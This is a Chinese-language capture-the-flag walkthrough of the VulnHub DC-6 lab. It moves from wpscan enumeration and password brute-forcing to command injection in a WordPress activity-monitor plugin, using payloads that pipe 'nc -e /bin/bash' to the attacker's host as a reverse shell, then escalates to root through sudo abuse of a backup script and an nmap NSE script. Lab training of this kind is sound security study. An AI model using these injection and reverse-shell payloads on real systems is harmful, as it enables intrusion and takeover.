靶場下載鏈接:
Download:
http://www.five86.com/downloads/DC-6.zip
Download (Mirror):
https://download.vulnhub.com/dc/DC-6.zip
Download (Torrent):
https://download.vulnhub.com/dc/DC-6.zip.torrent ( Magnet)
提權輔助工具LinEnum下載:https://download.csdn.net/download/weixin_41082546/11609409
提權輔助工具linuxprivchecker下載:https://download.csdn.net/download/weixin_41082546/11609428
0x01 環境搭建
直接使用VMware 或者 virtulbox 打開指定路徑會自動導入,由於作者默認設置的是橋接模式,我們手動改為nat 模式即可。
0x02 主機發現
由於主機ip未知,首先我們應該考慮獲得目標的ip地址,思路就是使用arp去發現內網存活主機,從而確定目標主機ip為192.168.88.184。
root@kali:~# netdiscover -i eth0 -r 192.168.88.1/24
0x03 端口探測
直接使用nmap進行端口探測,發現開放了兩個端口22(ssh)、80(http)
Did not follow redirect to http://wordy/ 其中 web 服務被重定向到 http://wordy/
此時我們要么准備字典爆破ssh,要么通過web進行滲透。我們先來滲透web吧
0x04 訪問web服務
由於web服務被重定向到http://wordy/ ,我們可以本地添加域名到主機文件,這樣以后我們訪問http://wordy/ 就相當於訪問對應的ip地址。添加完域名及對應ip后,可以發現已經能夠訪問http://wordy/
訪問 http://wordy/ ,可以看到是一個wordpress的網站。
0x05 漏洞掃描
使用wordpress漏洞測試工具wpscan進行網站漏洞探測,wpscan是一款針對wordpress的黑盒漏洞掃描器,可以獲得包括版本、主體、插件等信息。
git clone https://github.com/wpscanteam/wpscan.git kali自帶的wpscan數據庫升級不了,所以我又重裝了一個。
wpscan --url http://wordy --enumerate vp --enumerate vt --enumerate u
--enumerate u 枚舉用戶
--enumerate p 掃描安裝的插件
--enumerate vp 掃描目標插件中的安全漏洞
--enumerate t 掃描主題
--enumerate vt 掃描主題中存在的漏洞
--enumerate tt 掃描文件漏洞
掃描結果
鏈接信息:
[+] http://wordy/
| Interesting Entry: Server: Apache/2.4.25 (Debian)
[+] http://wordy/xmlrpc.php
[+] http://wordy/readme.html
[+] Upload directory has listing enabled: http://wordy/wp-content/uploads/
版本信息:
[+] WordPress version 5.1.1 identified (Latest, released on 2019-03-13).
| Detected By: Rss Generator (Passive Detection)
主題信息:
[+] WordPress theme in use: twentyseventeen
| Location: http://wordy/wp-content/themes/twentyseventeen/
| Last Updated: 2019-05-07T00:00:00.000Z
用戶枚舉:
[i] User(s) Identified:
[+] admin
[+] graham
[+] mark
[+] sarah
[+] jens
0x05 利用已知信息登錄系統
生成用戶字典和密碼
cat rockyou.txt | grep k01 > k01.txt 生成密碼字典
./wpscan --url http://wordy/ --passwords /usr/share/wordlists/k01.txt --usernames /root/wp.txt
我們獲得了Username: mark, Password: helpdesk01
我們使用獲得的密碼登錄
http://wordy/wp-admin/
可以看到安裝了activity_monitor插件。
ok,我們去搜索activity_monitor插件相關漏洞。
0x06 漏洞利用
查看描述,通過替換ip、端口可以反彈shell
替換為如下格式即可:
nc -lvvp 333 我們在本機監聽333端口
並且開啟一個簡單的臨時的web服務,去訪問45274.html 來觸發漏洞
python -m SimpleHTTPServer 8080
訪問web服務,發送google.fr| nc 192.168.88.183 333 -e /bin/bash給目標
成功接收到目標反彈回來的shell
也可以訪問
http://wordy/wp-admin/admin.php?page=plainview_activity_monitor&tab=activity_tools輸入ip,點擊lookup,通過抓包修改ip參數的值為baidu.com | nc -e /bin/bash 192.168.88.183 333
進⼀步執⾏如下指令獲取完整的shell:
python -c 'import pty; pty.spawn("/bin/bash")'
通過⽬錄查看,發現在/home/mark/stuff⽬錄下存在thing-to-do.txt⽂件,其內容為:
可以看到偶一個用戶名和密碼: graham - GSo7isUM1D4,由於系統開啟了ssh,我們可以嘗試進行登錄一下:
OK,登錄成功了!
0x07 權限提升
我們使用graham成功登錄了目標系統。
使用sudo -l 查看目前用戶可以執行的操作,發現我們可以運行jens用戶下面的backups.sh。查看其內容是對web進行打包備份的。
#!/bin/bash
tar -czf backups.tar.gz /var/www/html
我們可以將解壓命令刪除,替換成/bin/bash,以jens用戶去執行該腳本
此時我們已經是jens用戶了,我們繼續執行sudo -l 命令去查找我們可以進行的操作。
NOPASSWD: /usr/bin/nmap,jens用戶可以在無需輸入密碼的情況下使用nmap,我們繼續使用nmap去調用我們的腳本例如/bin/bash.
echo "os.execute('/bin/bash')" > /tmp/root.nse
sudo nmap --script=/tmp/root.nse
通過nmap運行該腳本我們成功進入root用戶。
